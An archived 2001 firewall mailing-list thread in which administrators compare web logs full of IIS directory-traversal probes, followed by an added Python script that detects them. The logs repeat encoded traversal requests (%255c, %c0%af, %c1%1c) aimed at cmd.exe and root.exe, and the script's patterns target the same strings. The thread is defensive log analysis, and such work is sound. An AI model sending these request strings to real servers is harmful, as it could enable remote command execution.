Hi,
this one isn't new stuff, see below

http://archives.neohapsis.com/archives/snort/2001-05/0215.html

Paul
-----Original Message-----
From:   Frank Neumann [SMTP:[EMAIL PROTECTED]]
Sent:   Tuesday, September 18, 2001 11:27 AM
To:     Ron DuFresne
Cc:     [EMAIL PROTECTED]
Subject:        Re: something new afoot, sweeping scans:

Hi folks,

Ron DuFresne wrote:

> Folks,
>
> Someone mentioned seeing similar signatures in their logs earlier today
> to the signatures we are seeing in dramatic rapidity in a short time span.
> Are other sites seeing similar signatures <quick greps attached and
> posted below>  Has a new toy been unleashed, or is this an old toy we have
> not seen the signature for before:

I found similar log entries in one of my web servers dating from May (see
excerpt from log). But these were only a few scans. Starting today I
recognize at least as many hits as we had with Code Red. So it doesn't
seem to be a new virus/worm/whatever.

[23/May/2001:00:55:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 305

Regards,
Frank

> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:44 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:49:46 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:48 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:49:50 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:51 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232

_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
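
Added example, not part of the original thread or any poster's code: a small Python normaliser for recognising the request shapes in the log excerpts above. It percent-decodes each path until it is stable, folds byte pairs led by 0xC0/0xC1, and then matches `..` segments and `cmd.exe`/`root.exe`. The sample lines, the 192.0.2.x addresses, the reason labels and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Common Log Format: client, ident, user, [timestamp], "request line", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
# 0xC0/0xC1 never start a valid UTF-8 sequence (they could only encode ASCII).
OVERLONG = re.compile(rb"[\xc0\xc1](.)", re.S)
TARGETS = (b"cmd.exe", b"root.exe")

SAMPLE = [  # constructed lines modelled on the request shapes in the thread
    '192.0.2.10 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '192.0.2.10 - - [18/Sep/2001:10:00:56 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232',
    '192.0.2.10 - - [18/Sep/2001:10:01:00 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231',
    '192.0.2.10 - - [18/Sep/2001:10:01:02 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215',
    '192.0.2.77 - - [18/Sep/2001:10:02:11 -0400] "GET /index.html HTTP/1.0" 200 1043',
]

def _fold(m):
    # Fold the byte pair as a lenient decoder would; used for matching only.
    lead, tail = m.group(0)[0], m.group(1)[0]
    return bytes([(lead & 0x1F) << 6 | (tail & 0x3F)])

def classify(uri):
    """Return a sorted list of reasons the request path looks like a probe."""
    raw = uri.split("?", 1)[0].encode("latin-1", "replace")
    reasons, passes = set(), 0
    while passes < 5:                      # bounded: decode until stable
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw, passes = decoded, passes + 1
    if passes > 1:                         # e.g. %255c -> %5c -> backslash
        reasons.add("multi-pass-encoding")
    if OVERLONG.search(raw):
        reasons.add("invalid-utf8-lead-byte")
    path = OVERLONG.sub(_fold, raw).replace(b"\\", b"/").lower()
    if b".." in path.split(b"/"):
        reasons.add("dot-dot-traversal")
    if path.endswith(TARGETS):
        reasons.add("command-interpreter")
    return sorted(reasons)

def scan(lines):
    """Return (client, status, reasons) for every line with at least one reason."""
    hits = []
    for m in filter(None, map(LOG_RE.match, lines)):
        if why := classify(m.group(2)):
            hits.append((m.group(1), int(m.group(3)), why))
    return hits
```

Matching on the normalised path rather than on each literal encoding means one rule covers all the variants seen in the excerpts.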
